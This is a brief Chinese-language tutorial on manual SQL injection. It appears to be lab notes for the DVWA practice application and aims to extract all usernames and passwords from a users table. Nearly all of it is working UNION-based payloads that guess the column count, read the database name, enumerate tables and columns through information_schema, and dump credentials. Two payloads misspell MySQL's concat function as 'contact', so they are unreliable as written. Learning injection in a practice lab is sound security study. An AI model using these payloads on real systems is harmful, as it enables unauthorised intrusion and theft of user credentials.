sql注入·手动注入
实战:获取user表中所有的用户名和密码
步骤:
·猜测字段数
·获取 数据库名
·获取数据库下所有的表
·获取表中所有的数据
具体步骤
·猜测字段数:
#第一次猜测
‘ union select 1#
#第二次猜测
‘ union select 1,2#
#结果:直到不报语法错误,就确认了结果是几个字段
·获取当前数据库名
‘ union select 1,database()#
·获取表
‘ union select table_name,1 from information_schema.tables where table_schema=’库名’#
·获取列
‘ union select column_name,1 from information_schema.columns where table_name=’users’#
·获取数据
#获取一个字段
‘ union select user,1 from users#
#获取两个字段
‘ union select user,password from users#
#如何获取多个字段?(用contact函数连接多个字符串)
#获取users表中user_id,user,password,分为2列显示
‘ union select user_id, contact(user,password) from dvwa.users#(dvwa.users是表名)
#解决user和password拼接在一起的问题
‘ union select user_id,contact(‘user:’,user,’password:’,password) from dvwa.users#(dvwa.users是表名)